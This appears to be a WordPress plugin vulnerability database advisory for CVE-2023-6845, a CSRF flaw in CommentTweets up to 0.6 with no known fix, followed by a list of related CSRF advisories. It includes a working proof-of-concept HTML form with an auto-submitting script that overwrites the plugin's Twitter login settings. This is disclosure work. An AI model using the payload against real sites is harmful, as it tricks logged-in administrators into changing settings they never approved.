CommentTweets <= 0.6 – Settings Update via CSRF | CVE 2023-6845 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

<form action="https://example.com/wp-admin/options-general.php?page=commenttweets%2FTwitterCommentNotification.php" method="POST">
    <input type="text" name="twitterlogin" value="aaa">
    <input type="text" name="twitterpw" value="bbb">
    <input type="text" name="submit-type" value="login">
    <input type="text" name="submit" value="save login">
</form>
<script>
    HTMLFormElement.prototype.submit.call(
        document.forms[0]
    );
</script>

Affects Plugins

No known fix

References

CVE

URL

https://magos-securitas.com/txt/2023-6845

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Daniel Ruf

Submitter

Daniel Ruf

Submitter website

https://magos-securitas.com

Verified

Yes

WPVDB ID

cbdaf158-f277-4be4-b022-68d18dae4c55

Timeline

Publicly Published

2023-12-10 (about 5 months ago)

Added

2023-12-16 (about 4 months ago)

Last Updated

2023-12-16 (about 4 months ago)

Other

Published

Title

Published

2023-11-28

Title

AdFoxly – Ad Manager, AdSense Ads & Ads.txt <= 1.8.5 - Cross-Site Request Forgery

Published

2023-11-28

Title

Chat Bubble <= 2.4 - Settings Update via CSRF

Published

2024-04-24

Title

HL Twitter <= 2014.1.18 - Unlink Twitter Account via CSRF

Published

2020-09-26

Title

WooCommerce Checkout & Funnel Builder by CartFlows < 1.5.16 - Cross-Site Request Forgery

Published

2019-06-19

Title

Personalized WooCommerce Cart Page <= 2.4 - Cross-Site Request Forgery (CSRF)